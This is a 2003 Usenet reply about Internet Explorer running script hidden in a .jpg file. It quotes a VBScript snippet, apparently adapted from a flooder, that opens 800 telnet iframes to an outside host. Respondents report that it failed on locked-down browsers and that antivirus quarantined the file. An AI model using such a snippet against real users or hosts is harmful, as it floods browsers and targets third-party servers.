Re: Web based email issues

From: Colonel Flagg (colonel_flagg_at_NOSOUPFORJ00internetwarzone.org)
Date: 09/16/03 

Date: Tue, 16 Sep 2003 16:45:10 -0400

In article <5JG9b.5762$jg7.143753@news1.telusplanet.net>,
fmcgriff@nospam.com says...
> > Basically, from what i understand MSIE executes the code within the JPG
> > file....
> >
> > <html><body>
> > <script type="text/vbscript">
> > for a=1 to 800
> > document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org" +
> > chr(34) + ">")
> > next
> > </script>
> > </body>
> > </html>
> >
> > Save as .jpg and open via MSIE, now i forget if it works locally (C:\...)
> or
> > over http, and right now i dont have time to check. If the code fails let
> me
> > know cuz i edited it from the original which was a M$ flooder.
>
> I tried with my install of MSIE 6.0.28 and it does not execute -- whether
> called from a local drive or from a website. The only change made was to
> point to a URL I control. My security is set to prompt when launching code
> in an iframe and MSIE did not ask if it could do anything. The page
> displayed was blank, though the source was the same as in the file.
>
>
>

f-secure immediately pinpointed this jpg as containing the iframe
trojan/exploit.

no, it didn't run, as my browser is locked down from allowing this,
however, the content was downloaded, as it should have been, and
immediately quarantined by f-secure. 

-- 
Colonel Flagg
http://www.internetwarzone.org/
Privacy at a click:
http://www.cotse.net 
Q: How many Bill Gates does it take to change a lightbulb?
A: None, he just defines Darkness? as the new industry standard..."
"...I see stupid people."